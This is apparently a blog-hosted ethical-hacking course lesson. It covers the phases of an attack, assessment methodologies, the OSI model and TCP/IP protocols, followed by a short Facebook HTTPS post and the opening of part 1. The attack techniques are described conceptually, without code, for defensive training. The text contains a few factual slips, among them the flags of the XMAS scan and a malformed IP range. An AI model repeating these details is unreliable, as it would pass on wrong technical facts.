One key defense against the hacker is the practice of deny all. The practice of the deny all rule can help reduce the effectiveness of the hacker’s activities at this step. Deny all means that all ports and applications are turned off, and only the minimum number of applications and services are turned on that are needed to accomplish the organization’s goals.

Unlike the elite black hat hacker who attempts to remain stealth, script kiddies might even use vulnerability scanners such as Nessus to scan a victim’s network. Although the activities of the black hat hacker can be seen as a single shot in the night, the script kiddies scan will appear as a series of shotgun blasts, as their activity will be loud and detectable. Programs such as Nessus are designed to find vulnerabilities but are not designed to be a hacking tool; as such, they generate a large amount of detectable network traffic.

TIP

The greatest disadvantage of vulnerability scanners is that they are very noisy.

Gaining Access

As far as potential damage, this could be considered one of the most important steps of an attack. This phase of the attack occurs when the hacker moves from simply probing the network to actually attacking it. After the hacker has gained access, he can begin to move from system to system, spreading his damage as he progresses.

Access can be achieved in many different ways. A hacker might find an open wireless access point that allows him a direct connection or the help desk might have given him the phone number for a modem used for out-of-band management. Access could be gained by finding a vulnerability in the web server’s software. If the hacker is really bold, he might even walk in and tell the receptionist that he is late for a meeting and will wait in the conference room with network access. Pity the poor receptionist who unknowingly provided network access to a malicious hacker. These things do happen to the company that has failed to establish good security practices and procedures.

The factors that determine the method a hacker uses to access the network ultimately comes down to his skill level, amount of access he achieves, network architecture, and configuration of the victim’s network.

Escalation of Privilege

Although the hacker is probably happy that he has access, don’t expect him to stop what he is doing with only a “Joe user” account. Just having the access of an average user probably won’t give him much control or access to the network. Therefore, the attacker will attempt to escalate himself to administrator or root privilege. After all, these are the individuals who control the network, and that is the type of power the hacker seeks.

Privilege escalation can best be described as the act of leveraging a bug or vulnerability in an application or operating system to gain access to resources that normally would have been protected from an average user. The end result of privilege escalation is that the application performs actions that are running within a higher security context than intended by the designer, and the hacker is granted full access and control.

Maintaining Access

Would you believe that hackers are paranoid people? Well, many are, and they worry that their evil deeds might be uncovered. They are diligent at working on ways to maintain access to the systems they have attacked and compromised. They might attempt to pull down the etc/passwd file or steal other passwords so that they can access other user’s accounts.

Rootkits are one option for hackers. A rootkit is a set of tools used to help the attacker maintain his access to the system and use it for malicious purposes. Rootkits have the capability to mask the hacker, hide his presence, and keep his activity secret. They will be discussed in detail later on in the class.

Sometimes hackers might even fix the original problem that they used to gain access, where they can keep the system to themselves. After all, who wants other hackers around to spoil the fun? Sniffers are yet another option for the hacker and can be used to monitor the activity of legitimate users. At this point, hackers are free to upload, download, or manipulate data as they see fit.

Covering Tracks and Placing Backdoors

Nothing happens in a void, and that includes computer crime. Hackers are much like other criminals in that they would like to be sure to remove all evidence of their activities. This might include using rootkits or other tools to cover their tracks. Other hackers might hunt down log files and attempt to alter or erase them.

Hackers must also be worried about the files or programs they leave on the compromised system. File hiding techniques, such as hidden directories, hidden attributes, and Alternate Data Streams (ADS), can be used. As an ethical hacker, you will need to be aware of these tools and techniques to discover their activities and to deploy adequate countermeasures.

Backdoors are methods that the hacker can use to reenter the computer at will. The tools and techniques used to perform such activities are discussed later on in the class. At this point, what is important is to identify the steps.

The Ethical Hacker’s Process

As an ethical hacker, you will follow a similar process to one that an attacker uses. The stages you progress through will map closely to those the hacker uses, but you will work with the permission of the company and will strive to “do no harm.” By ethical hacking and assessing the organizations strengths and weaknesses, you will perform an important service in helping secure the organization. The ethical hacker plays a key role in the security process. The methodology used to secure an organization can be broken down into five key steps. Ethical hacking is addressed in the first:

Assessment
Ethical hacking, penetration testing, and hands-on security tests.
Policy Development
Development of policy based on the organization’s goals and mission. The focus should be on the organization’s critical assets.
Implementation
The building of technical, operational, and managerial controls to secure key assets and data.
Training
Employees need to be trained as to how to follow policy and how to configure key security controls, such as Intrusion Detection Systems (IDS) and firewalls.
Audit
Auditing involves periodic reviews of the controls that have been put in place to provide good security. Regulations such as Health Insurance Portability and Accountability Act (HIPAA) specify that this should be done yearly.

All hacking basically follows the same six-step methodology discussed in the previous section: reconnaissance, scanning and enumeration, gaining access, escalation of privilege, maintaining access, and covering tracks and placing backdoors.

Is this all you need to know about methodologies? No, different organizations have developed diverse ways to address security testing. There are some basic variations you should be aware of. These include National Institute of Standards and Technology 800-42, Threat and Risk Assessment Working Guide, Operational Critical Threat, Asset, fand Vulnerability Evaluation, and Open Source Security Testing Methodology Manual. Each is discussed next.

National Institute of Standards and Technology (NIST)

The NIST 800-42 method of security assessment is broken down into four basic stages that Include:

Planning
Discovery
Attack
Reporting

NIST has developed many standards and practices for good security. This methodology is contained in NIST 800-42. This is just one of several documents available to help guide you through an assessment. Find out more at http://csrc.nist.gov/publications/nistpubs.

Threat and Risk Assessment Working Guide (TRAWG)

The Threat and Risk Assessment Working Guide provides guidance to individuals or teams carrying out a Threat and Risk Assessment (TRA) for an existing or proposed IT system. This document helps provide IT security guidance and helps the user determine which critical assets are most at risk within that system and develop recommendations for safeguards. Find out more at http://www.cse-cst.gc.ca/publication.../itsg04-e.html.

Operational Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)

OCTAVE focuses on organizational risk and strategic, practice-related issues. OCTAVE is driven by operational risk and security practices. OCTAVE is self-directed by a small team of people from the organization’s operational, business units, and the IT department. The goal of OCTAVE is to get departments to work together to address the security needs of the organization. The team uses the experience of existing employees to define security, identify risks, and build a robust security strategy. Find out more at www.cert.org/octave.

Open Source Security Testing Methodology Manual (OSSTMM)

One well-known open sourced methodology is the OSSTMM. The OSSTMM divides security assessment into six key points known as sections. They are as follows:

* Physical Security
* Internet Security
* Information Security
* Wireless Security
* Communications Security
* Social Engineering

The OSSTMM gives metrics and guidelines as to how many man-hours a particular assessment will require. Anyone serious about learning more about security assessment should review this documentation. The OSSTMM outlines what to do before, during, and after a security test. Find out more at www.isecom.org/osstmm.

Security and the Stack

To really understand many of the techniques and tools that hackers use, you need to understand how systems and devices communicate. Hackers understand this, and many think outside the box when planning an attack or developing a hacking tool. As an example, TCP uses flags to communicate, but what if a hacker sends TCP packets with no flags set? Sure, it breaks the rules of the protocol, but it might allow the attacker to illicit a response to help identify the server. As you can see, having the ability to know how a protocol, service, or application works and how it can be manipulated can be beneficial.

The OSI model and TCP/IP are discussed in the next sections. Pay careful attention to the function of each layer of the stack, and think about what role each layer plays in the communication process.

The OSI Model

Objective:

Understand the Open Systems Interconnect (OSI) Model

Once upon a time, the world of network protocols was much like the Wild West. Everyone kind of did their own thing, and if there were trouble, there would be a shoot-out on Main Street. Trouble was, you never knew whether you were going to get hit by a stray bullet. Luckily, the IT equivalent of the sheriff came to town. This was the International Standards Organization (ISO). The ISO was convinced that there needed to be order and developed the Open Systems Interconnect (OSI) model in 1984. The model is designed to provide order by specifying a specific hierarchy in which each layer builds on the output of each adjacent layer. Although its role as sheriff was not widely accepted by all, the model is still used today as a guide to describe the operation of a networking environment.

There are seven layers of the OSI model: the Application, Presentation, Session, Transport, Network, Data Link, and Physical layers. The seven layers of the OSI model are shown in Figure 2.1, which overviews data moving between two systems up and down the stack, and described in the following list:

Application layer

Layer 7 is known as the Application layer. Recognized as the top layer of the OSI model, this layer serves as the window for application services. The Application layer is one that most users are familiar with as it is the home of email programs, FTP, Telnet, web browsers, and office productivity suites, as well as many other applications. It is also the home of many malicious programs such as viruses, worms, Trojan horse programs, and other virulent applications.

Presentation layer

Layer 6 is known as the Presentation layer. The Presentation layer is responsible for taking data that has been passed up from lower levels and putting it into a format that Application layer programs can understand. These common formats include American Standard Code for Information Interchange (ASCII), Extended Binary-Coded Decimal Interchange Code (EBCDIC), and American National Standards Institute (ANSI). From a security standpoint, the most critical process handled at this layer is encryption and decryption. If properly implemented, this can help security data in transit.

Session layer

Layer 5 is known as the Session layer. Its functionality is put to use when creating, controlling, or shutting down a TCP session. Items such as the TCP connection establishment and TCP connection occur here. Session-layer protocols include items such as Remote Procedure Call and SQLNet from Oracle. From a security standpoint, the Session layer is vulnerable to attacks such as session hijacking. A session hijack can occur when a legitimate user has his session stolen by a hacker. This will be discussed in detail in lesson 7, "Sniffers, Session Hijacking, and Denial of Service ".

Transport layer

Layer 4 is known as the Transport layer. The Transport layer ensures completeness by handling end-to-end error recovery and flow control. Transport-layer protocols include TCP, a connection-oriented protocol. TCP provides reliable communication through the use of handshaking, acknowledgments, error detection, and session teardown, as well as User Datagram Protocol (UDP), a connectionless protocol. UDP offers speed and low overhead as its primary advantage. Security concerns at the transport level include Synchronize(SYN) attacks, Denial of Service(DoS), and buffer overflows.

Network layer

Layer 3 is known as the Network layer. This layer is concerned with logical addressing and routing. The Network layer is the home of the Internet Protocol (IP), which makes a best effort at delivery of datagrams from their source to their destination. Security concerns at the network level include route poisoning, DoS, spoofing, and fragmentation attacks. Fragmentation attacks occur when hackers manipulate datagram fragments to overlap in such a way to crash the victim’s computer. IPSec is a key security service that is available at this layer.

Data Link layer

Layer 2 is known as the Data Link layer. The Data Link layer is responsible for formatting and organizing the data before sending it to the Physical layer. The Data Link layer organizes the data into frames. A frameis a logical structure in which data can be placed; it’s a packet on the wire. When a frame reaches the target device, the Data Link layer is responsible for stripping off the data frame and passing the data packet up to the Network layer. The Data Link layer is made up of two sub layers, including the logical link control layer (LLC) and the media access control layer (MAC). You might be familiar with the MAC layer, as it shares its name with the MAC addressing scheme. These 6-byte (48-bit) addresses are used to uniquely identify each device on the local network. A major security concern of the Data Link layer is the Address Resolution Protocol (ARP) process. ARP is used to resolve known Network layer addresses to unknown MAC addresses. ARP is a trusting protocol and, as such, can be used by hackers for APR poisoning, which can allow them access to traffic on switches they should not have.

Physical layer

Layer 1 is known as the Physical layer. At Layer 1, bit-level communication takes place. The bits have no defined meaning on the wire, but the Physical layer defines how long each bit lasts and how it is transmitted and received. From a security standpoint, you must be concerned anytime a hacker can get physical access. By accessing a physical component of a computer network—such as a computer, switch, or cable—the attacker might be able to use a hardware or software packet snifferto monitor traffic on that network. Sniffers enable attacks to capture and decode packets. If no encryption is being used, a great deal of sensitive information might be directly available to the hacker.

TIP

For the exam, make sure that you know which attacks and defenses are located on each layer.

Anatomy of TCP/IP Protocols

Objectives:
Have a basic knowledge of the Transmission Control Protocol/Internet Protocol (TCP/IP) and their functionality Describe the basic TCP/IP frame structure

Four main protocols form the core of TCP/IP: the Internet Protocol (IP), the Transmission Control Protocol (TCP), the User Datagram Protocol (UDP), and the Internet Control Message Protocol (ICMP). These protocols are essential components that must be supported by every device that communicates on a TCP/IP network. Each serves a distinct purpose and is worthy of further discussion. The four layers of the TCP/IP stack are shown in Figure 2.2. The figure lists the Application, Host-to-host, Internet, and Network Access layers and describes the function of each.

TCP/IP is the foundation of all modern networks. In many ways, you can say that TCP/IP has grown up along with the development of the Internet. Its history can be traced back to standards adopted by the U.S. government’s Department of Defense (DoD) in 1982. Originally, the TCP/IP model was developed as a flexible, fault tolerant set of protocols that were robust enough to avoid failure should one or more nodes go down. After all, the network was designed to these specifications to withstand a nuclear strike, which might destroy key routing nodes. The designers of this original network never envisioned the Internet we use today. Because TCP/IP was designed to work in a trusted environment, many TCP/IP protocols are now considered insecure. As an example, Telnet is designed to mask the password on the user’s screen, as the designers didn’t want shoulder surfers stealing a password; however, the password is sent in clear text on the wire. Little concern was ever given to the fact that an untrustworthy party might have access to the wire and be able to sniff the clear text password. Most networks today run TCP/IPv4. Many security mechanisms in TCP/IPv4 are add-ons to the original protocol suite. As the layers are stacked one atop another, encapsulation takes place. Encapsulation is the technique of layering protocols in which one layer adds a header to the information from the layer above. An example of this can be seen in Figure 2.3. This screenshot from a sniffer program has UDP highlighted.

TIP
A lot of free packet sniffing utilities are available on the Internet. Consider evaluating Packetyzer for Windows or Ethereal for Linux. There are also many commercial sniffing tools, such as Sniffer by Network General. These tools can help you learn more about encapsulation and packet structure.

Let’s take a look at each of the four layers of TCP/IP and discuss some of the security concerns lassociated with each layer and specific protocols. The four layers of TCP/IP include

The Application layer
The Host-to-host layer
The Internet layer
The Network access layer

The Application Layer

Objective:

Describe application ports and how they are numbered The Application layer sets at the top of the protocol stack. This layer is responsible for application support. Applications are typically mapped not by name, but by their corresponding port. Ports are placed into TCP and UDP packets so that the correct application can be passed to the required protocols below.

Although a particular service might have an assigned port, nothing specifies that services cannot listen on another port. A common example of this is Simple Mail Transfer Protocol (SMTP). The assigned port of this is 25. Your cable company might block port 25 in an attempt to keep you from running a mail server on your local computer; however, nothing prevents you from running your mail server on another local port. The primary reason services have assigned ports is so that a client can easily find that service on a remote host. As an example, FTP servers listen at port 21, and Hypertext Transfer Protocol (HTTP) servers listen at port 80. Client applications, such as a File Transfer Protocol (FTP) program or browser, use randomly assigned ports typically greater than 1023.

There are approximately 65,000 ports; they are divided into well-known ports (0–1023), registered ports (1024–49151), and dynamic ports (49152–65535). Although there are hundreds of ports and corresponding applications in practice, less than a hundred are in common use. The most common of these are shown in Table 2.1. These are some of the ports that a hacker would look for first on a victim’s computer systems.

TABLE 2.1 Common Ports and Protocols

Code:

Port   Service      Protocol
21       FTP           TCP 
22       SSH           TCP 
23       Telnet        TCP 
25       SMTP          TCP 
53       DNS           TCP/UDP 
67/68    DHCP          UDP 
69       TFTP          UDP 
79       Finger        TCP 
80       HTTP          TCP 
88       Kerberos      UDP 
110      POP3          TCP 
111      SUNRPC        TCP/UDP 
135      MS RPC        TCP/UDP 
139      NB Session    TCP/UDP 
161      SNMP          UDP 
162       SNMP Trap     UDP 
389     LDAP          TCP 
443      SSL           TCP 
445      SMB over IP   TCP/UDP 
1433     MS-SQL        TCP

Blocking these ports if they are not needed is a good idea, but it’s better to practice the principle of least privilege. The principle of least privilege means that you give an entity the least amount of access only to perform its job and nothing more. If a port is not being used, it should be closed. Remember that security is a never ending process; just because the port is closed today, doesn’t mean that it will be closed tomorrow. You will want to periodically test for open ports. Not all applications are created equally. Although some, such as SSH, are relatively secure, others, such as Telnet, are not.

The following list discusses the operation and security issues of some of the common applications:

File Transfer Protocol (FTP)

FTP is a TCP service and operates on ports 20 and 21. This application is used to move files from one computer to another. Port 20 is used for the data stream and transfers the data between the client and the server. Port 21 is the control stream and is used to pass commands between the client and the FTP server. Attacks on FTP target misconfigured directory permissions and compromised or sniffed clear-text passwords. FTP is one of the most commonly hacked services.

Telnet

Telnet is a TCP service that operates on port 23. Telnet enables a client at one site to establish a session with a host at another site. The program passes the information typed at the client’s keyboard to the host computer system. Although Telnet can be configured to allow anonymous connections, it should be configured to require usernames and passwords. Unfortunately, even then, Telnet sends them in clear text. When a user is logged in, he or she can perform any allowed task. Applications, such as Secure Shell (SSH), should be considered as a replacement. SSH is a secure replacement for Telnet and does not pass cleartext username and passwords.

Simple Mail Transfer Protocol (SMTP)

This application is a TCP service that operates on port 25. It is designed for the exchange of electronic mail between networked systems. Messages sent through SMTP have two parts: an address header and the message text. All types of computers can exchange messages with SMTP. Spoofing and spamming are two of the vulnerabilities associated with SMTP.

Domain Name Service (DNS)

This application operates on port 53 and performs address translation. Although we sometimes realize the role DNS plays, it serves a critical function in that it converts fully qualified domain names (FQDNs) into a numeric IP address or IP addresses into FQDNs. If someone were to bring down DNS, the Internet would continue to function, but it would require that Internet users know the IP address of every site they want to visit. For all practical purposes, the Internet would not be useable without DNS.

The DNS database consists of one or more zone files. Each zone is a collection of structured resource records. Common record types include the Start of Authority(SOA) record, A record, CNAME record, NS record, PTR record, and the MX record. There is only one SOA record in each zone database file. It describes the zone name space. The A record is the most common, as it contains IP addresses and names of specific hosts. The CNAME record is an alias. For example, the outlaw William H. Bonney went by the alias of Billy the Kid. The NS record lists the IP address of other name servers. An MX recordis a mail exchange record. This record has the IP address of the server where email should be delivered. Hackers can target DNS servers with many types of attacks. One such attack is DNS cache poisoning. This type of attack sends fake entries to a DNS server to corrupt the information stored there. DNS can also be susceptible to DoS attacks and to unauthorized zone transfers. DNS uses UDP for DNS queries and TCP for zone transfers.

Trivial File Transfer Protocol (TFTP)

TFTP operates on port 69. It is considered a down-and-dirty version of FTP as it uses UDP to cut down on overhead. It not only does so without the session management offered by TCP, but it also requires no authentication, which could pose a big security risk. It is used to transfer router configuration files and by cable companies to configure cable modems. TFTP is a favorite of hackers and has been used by programs, such as the Nimda worm, to move data without having to use input usernames or passwords.

Hypertext Transfer Protocol (HTTP)

HTTP is a TCP service that operates on port 80. This is one of the most well-known applications. HTTP has helped make the Web the popular protocol it is today. The HTTP connection model is known as a stateless connection. HTTP uses a request response protocol in which a client sends a request and a server sends a response. Attacks that exploit HTTP can target the server, browser, or scripts that run on the browser. Code Red is an example of code that targeted a web server.

Simple Network Management Protocol(SNMP)

SNMP is a UDP service and operates on ports 161 and 162. It was envisioned to be an efficient and inexpensive way to monitor networks. The SNMP protocol allows agents to gather information, including network statistics, and report back to their management stations. Most large corporations have implemented some type of SNMP management. Some of the security problems that plague SNMP are caused by the fact that community strings can be passed as clear text and that the default community strings (public/private) are well known. SNMP version 3 is the most current, and it offers encryption for more robust security.

TIP

A basic understanding of these applications’ strengths and weaknesses will be needed for the exam.

The Host-to-Host Layer

Objectives:
Describe the TCP packet structure
Know the TCP flags and their meaning
Understand how UDP differs from TCP

The host-to-host layer provides end-to-end delivery. Two primary protocols are located at the host-to-host layer, which includes Transmission Control Protocol (TCP) and User Datagram Protocol (UDP).

Transmission Control Protocol (TCP)

TCP enables two hosts to establish a connection and exchange data reliably. To do this, TCP performs a three-step handshake before data is sent. During the data-transmission process, TCP guarantees delivery of data by using sequence and acknowledgment numbers. At the completion of the data-transmission process, TCP performs a four-step shutdown that gracefully concludes the session. The startup and shutdown sequences are shown in Figure 2.4.

TCP has a fixed packet structure that is used to provide flow control, maintain reliable communication, and ensure that any missing data is resent. At the heart of TCP is a 1-byte flag field. Flags help control the TCP process. Common flags include synchronize (SYN), acknowledgement (ACK), push (PSH), and finish (FIN). Figure 2.5 details the TCP packet structure. TCP security issues include TCP sequence number attacks, session hijacking, and SYN flood attacks. Programs, such as Nmap, manipulate TCP flags to attempt to identify active hosts.

The ports shown previously in Table 2.1 identify the source and target application, whereas the sequence and acknowledgement numbers are used to assemble packets into their proper order. The flags are used to manage TCP sessions—for example, the synchronize (SYN) and acknowledge (ACK) flags are used in the three-way handshaking, whereas the reset (RST) and finish (FIN) flags are used to tear down a connection. FIN is used during a normal four-step shutdown, whereas RST is used to signal the end of an abnormal session. The checksum is used to ensure that the data is correct, although an attacker can alter a TCP packet and the checksum to make it appear valid. Other flags include urgent (URG). If no flags are set at all, the flags can be referred to as Null, as none are set.

TIP
Not all hacking tools play by the rules; most port scanners can tweak TCP flags and send them in packets that should not normally exist in an attempt to illicit a response for the victim’s server. One such variation is the XMAS tree scan, which sets the SYN, URG, and PSH flags. Another is the NULL scan, which sets no flags in the TCP header.

User Datagram Protocol (UDP)

UDP performs none of the handshaking processes that we see performed with TCP. Although that makes it considerably less reliable than TCP, it does offer the benefit of speed. It is ideally suited for data that requires fast delivery and is not sensitive to packet loss. UDP is used by services such as DHCP and DNS. UDP is easier to spoof by attackers than TCP as it does not use sequence and acknowledgement numbers. Figure 2.6 shows the packet structure of UDP.

The Internet Layer

Objective:
Describe how Internet Control Message Protocol (ICMP) functions and its purpose

The Internet layer contains two important protocols: Internet Protocol (IP) and Internet Control Messaging Protocol (ICMP). IP is a routable protocol whose function is to make a best effort at delivery. The IP header is shown in Figure 2.7. Spend a few minutes reviewing it to better understand each field’s purpose and structure. While reviewing the structure of UDP, TCP, and IP, packets might not be the most exciting part of security work. A basic understanding is desirable because many attacks are based on manipulation of the packets. For example, the total length field and fragmentation is tweaked in a ping of death attack.

IP addresses are laid out in a dotted decimal notation format. IPv4 lays out addresses into a four decimal number format that is separated by decimal points. Each of these decimal numbers is one byte in length to allow numbers to range from 0–255. Table 2.2 shows IPv4 addresses and the number of available networks and hosts.

TABLE 2.2 Ipv4 Addressing

Code:

Address Class | Address Range | Number of Networks | Number of Hosts 
       A            1-126                126            16,777,214 
       B           128-191            16,384                65,534 
       C           192-223          2,097152                   254
       D           224-239                NA                    NA 
       E           240-255                NA                    NA

A number of addresses have also been reserved for private use. These addresses are non-routable and normally should not been seen on the Internet. Table 2.3 defines the private address ranges.

TABLE 2.3 Private Address Ranges

Code:

Address Class            Address Range             Default Subnet Mask 
       A          10.0.0.0 - 10.255.255.255.255       255.0.0.0  
       B          172.16.0.0 - 172.31.255.255         255.255.0.0  
       C          192.168.0.0 - 192.168.255.255       255.255.255.0

IP does more than just addressing. It can dictate a specific path by using strict or loose source routing, and IP is also responsible for datagram fragmentation. Fragmentation normally occurs when files must be split becauseof maximum transmission unit (MTU) size limitations.

Source Routing: The Hackers Friend

Source routing was designed to allow individuals the ability to specify the route that a packet should take through a network. It allows the user to bypass network problems or congestion. IP’s source routing informs routers not to use their normal routes for delivery of the packet but to send it via the router identified in the packet’s header. This lets a hacker use another system’s IP address and get packets returned to him regardless of what routes are in between him and the destination. This type of attack can be used if the victim’s web server is protected by an access list based on source addresses. If the hacker were to simply spoof one of the permitted source addresses, traffic would never be returned to him. By spoofing an address and setting the loose source routing option to force the response to return to the hacker’s network, the attack might succeed. The best defense against this type of attack is to block loose source routing and not respond to packets set with this option.

If IP must send a datagram larger than allowed by the network access layer that it uses, the datagram must be divided into smaller packets. Not all network topologies can handle the same datagram size; therefore, fragmentation is an important function. As IP packets pass through routers, IP reads the acceptable size for the network access layer. If the existing datagram is too large, IP performs fragmentation and divides the datagram into two or more packets. Each packet is labeled with a length, an offset, and a more bit. The length specifies the total length of the fragment, the offset specifies the distance from the first byte of the original datagram, and the more bit is used to indicate if the fragment has more to follow or if it is the last in the series of fragments. An example is shown in Figure 2.8.

The first fragment has an offset of 0 and occupies bytes 0–999. The second fragment has an offset of 1,000 and occupies bytes 1,000–1,999. The third fragment has an offset of 2,000 and occupies bytes 2,000–2,999, and the final fragment has an offset 3,000 and occupies bytes 3,000–3,599. Whereas the first three fragments have the more bit set to 1, the final fragment has the more bit set to 0 because no more fragments follow. These concepts are important to understand how various attacks function. If you are not completely comfortable with these concepts, you might want to review a general TCP/IP network book. TCP/IP Illustrated by Richard Stevens is recommended.

TIP
On modern networks, there should be very little fragmentation. Usually such traffic will indicate malicious activities.

To get a better idea of how fragmentation can be exploited by hackers, consider the following: Normally, these fragments follow the logical structured sequence as shown in Figure 2.8. Hackers can manipulate packets to cause them to overlap abnormally, as shown in Figure 2.9.

Hackers can also craft packets so that instead of overlapping, there will be gaps between various packets. These nonadjacent fragmented packets are similar to overlapping packets because they can crash or hang older operating systems that have not been patched.

TIP

A good example of the overlapping fragmentation attack is the teardrop attack. The teardrop attack exploits overlapping IP fragment and can crash Windows 95, Windows NT, and Windows 3.1 machines.

One of the other protocols residing at the Internet layer is ICMP. Its purpose is to provide feedback used for diagnostics or to report logical errors. ICMP messages follow a basic format. The first byte of an ICMP header indicates the type of ICMP message. The following byte contains the code for each particular type of ICMP. The ICMP type generally defines the problem, whereas the code is provided to allow a specific reason of what the problem is. As an example, a Type 3, Code 3 ICMP means that there was a destination error and that the specific destination error is that the targeted port is unreachable. Eight of the most common ICMP types are shown in Table 2.4.

TABLE 2.4 ICMP Types and Codes

Code:

Type    Code    Function 
 0/8     0       Echo Response/Request (Ping) 
3        0-15    Destination Unreachable 
4        0       Source Quench 
5        0-3     Redirect 
11       0-1     Time Exceeded 
12       0       Parameter Fault 
13/14    0       Time Stamp Request/Response 
17/18    0       Subnet Mask Request/Response

The most common ICMP type in Table 2.4 is the type 0 and 8, which is a ICMP ping request and reply. Although a ping is useful to determine if a host is up, it is also a useful tool for the attacker. The ping can be used to inform a hacker if a computer is online. Although the designers of ICMP envisioned a protocol that would be helpful and informative, hackers use ICMP to send the ping of death, craft Smurf DoS packets, query the timestamp of a system or its netmask, or even send ICMP type 5 packets to redirect traffic. A complete list of Type 3 codes are provided in Table 2.5.

TABLE 2.5 Type 3 Codes

Code:

Code  Function 
0    Net Unreachable 
1      Host Unreachable 
2      Protocol Unreachable 
3      Port Unreachable 
4      Fragmentation Needed and Don't Fragment was Set 
5      Source Route Failed 
6      Destination Network Unknown 
7      Destination Host Unknown 
8      Source Host Isolated 
9      Communication with Destination Network is Administratively Prohibited 
10     Communication with Destination Host is Administratively Prohibited 
11     Destination Network Unreachable for Type of Service 
12     Destination Host Unreachable for Type of Service 
13     Communication Administratively Prohibited

EXAM ALERT

Type 11 ICMP time exceeded messages are used by most traceroute programs to determine the IP addresses of intermediate routers.

Address Resolution Protocol (ARP) is the final protocol reviewed at the IP layer. ARP’s role in the world of networking is to resolve known IP addresses to unknown MAC addresses. ARP’s two-step resolution process is performed by first sending a broadcast message requesting the target’s physical address. If a device recognizes the address as its own, it issues an ARP reply containing its MAC address to the original sender. The MAC address is then placed in the ARP cache and used to address subsequent frames. You discover that hackers are interested in the ARP process as it can be manipulated to bypass the functionality of a switch. Because ARP was developed in a trusting world, bogus ARP responses are accepted as valid, which can allow attackers to redirect traffic on a switched network. Proxy ARPs can be used to extend a network and enable one device to communicate with a device on an adjunct node. ARP attacks play a role in a variety of man-in-the middle attacks, spoofing, and in-session hijack attacks.

EXAM ALERT

ARP is unauthenticated and, as such, can be used for unsolicited ARP replies, for poisoning the ARP table, and for spoofing another host.

The Network Access Layer

The network access layer is the bottom of the stack. This portion of the TCP/IP network model is responsible for the physical delivery of IP packets via frames. Ethernet is the most commonly used LAN frame type. Ethernet frames are addressed with MAC addresses that identify the source and destination device. MAC addresses are 6 bytes long and are unique to the Network Interface card (NIC) card in which they are burned. To get a better idea of what MAC addresses look like, review Figure 2.10, as it shows a packet with both the destination and source MAC addresses. Hackers can use a variety of programs to spoof MAC addresses. Spoofing MAC addresses can be a potential target to attackers attempting to bypass 802.11 wireless controls or when switches are used to control traffic by locking ports to specific MAC addresses.

MAC addresses can be either unicast, multicast, or broadcast. Although a destination MAC address can be any one of these three types, a frame will always originate from a unicast MAC address.

The three types of MAC addresses can be easily identified, as follows:

Code:

Type        Identified by 
Unicast     The first byte is always an even value. 
Multicast   The low order bit in the first byte is always on, and a multicast MAC addresses is an odd value. As an example, notice the first byte (01) of the following MAC address, 0x-01-00-0C-CC-CC-CC. 
Broadcast   They are all binary 1s or will appear in hex as FF FF FF FF FF FF.

Summary

This lesson discusses the attacker’s methodology, as well as some of the methodologies used by ethical hackers. Ethical hackers differ from malicious hackers in that ethical hackers seek to do no harm and work to improve an organization’s security by thinking like a hacker. This lesson also discusses the OSI model and the TCP/IP protocol suite. It looks at some of the most commonly used protocols in the suite and examines how they are used and misused by hackers. Common ports are discussed; as is the principle of deny all. Starting with all ports and protocols blocked leaves the organization in much more of a secure stance than simply blocking ports that are deemed dangerous or unneeded.

Facebook Security: Have you enabled https login?

noreply@blogger.com (Eracnid Mitnick) — Tue, 22 Feb 2011 11:10:00 +0000

Last month we carried Facebook's announcement to enable its users secure HTTPS access to the popular social networking website online. The security announcement closely after Mark Zuckerberg's Facebook page was hacked in late January.

Since the announcement, Facebook has been rolling out the option for users to enable secure HTTPS access to the website through their Web browsers. A lot of Facebook users already have the ability to better protect their Facebook account's security through HTTPS access, but we don't know if everyone knows how to enable the feature.

It's quite easy, actually. Just head over to Account Settings > Account Security in your Facebook profile.

Ethical Hacking Basics Class part 1

noreply@blogger.com (Eracnid Mitnick) — Tue, 22 Feb 2011 10:46:00 +0000

Introduction

This lesson introduces you to the world of ethical hacking. Ethical hacking is a form of legal hacking that is done with the permission of an organization to help increase its security. This lesson discusses many of the business aspects of penetration (pen) testing. Information about how to perform a pen test, what types can be performed, what are the legal requirements, and what type of report should be delivered are all basic items that you will need to know before you perform any type of security testing. However, first, you need to review some security basics. This lesson starts with a discussion of confidentiality, integrity, and availability. Finally, the lesson finishes up with the history of hacking and a discussion of some of the pertinent laws.

NOTE

Nothing learned in this class is intended to teach or encourage the use of security tools or methodologies for illegal or unethical purposes. Always act in a responsible manner. Make sure that you have written permission from the proper individuals before you use any of the tools or techniques described within. Always obtain permission before installing any of these tools on a network.

Security Fundamentals

Security is about finding a balance, as all systems have limits. No one person or company has unlimited funds to secure everything, and we cannot always take the most secure approach. One way to secure a system from network attack is to unplug it and make it a standalone system. Although this system would be relatively secure from Internet-based attackers, its usability would be substantially reduced. The opposite approach of plugging it in directly to the Internet without any firewall, antivirus, or security patches would make it extremely vulnerable, yet highly accessible. So, here again, you see that the job of security professionals is to find a balance somewhere between security and usability. Figure 1.1 demonstrates this concept.

To find this balance, you need to know what the goals of the organization are, what security is, and how to measure the threats to security. The next section discusses the goals of security.

Goals of Security

Objective:

Understand the security triangle, also known as CIA (confidentiality, integrity, and availability).

There are many ways in which security can be achieved, but it’s universally agreed that the security triad of confidentiality, integrity, and availability (CIA) form the basic building blocks of any good security initiative.

Confidentiality addresses the secrecy and privacy of information. Physical examples of confidentiality include locked doors, armed guards, and fences. Logical examples of confidentiality can be seen in passwords, encryption, and firewalls. In the logical world, confidentiality must protect data in storage and in transit. For a real-life example of the failure of confidentiality, look no further than the recent news reports that have exposed how several large-scale breaches in confidentiality were the result of corporations, such as Time Warner and City National Bank, misplacing or losing backup tapes with customer accounts, names, and credit information. The simple act of encrypting thebackup tapes could have prevented or mitigated the damage.

Integrity is the second piece of the CIA security triad. Integrity provides for the correctness of information. It allows users of information to have confidence in its correctness. Correctness doesn’t mean that the data is accurate, just that it hasn’t been modified in storage or transit. Integrity can apply to paper or electronic documents. It is much easier to verify the integrity of a paper document than an electronic one. Integrity in electronic documents and data is much more difficult to protect than in paper ones. Integrity must be protected in two modes: storage and transit.

Information in storage can be protected if you use access and audit controls. Cryptography can also protect information in storage through the use of hashing algorithms. Real-life examples of this technology can be seen in programs such as Tripwire, MD5Sum, and Windows File Protection (WFP). Integrity in transit can be ensured primarily by the protocols used to transport the data. These security controls include hashing and cryptography.

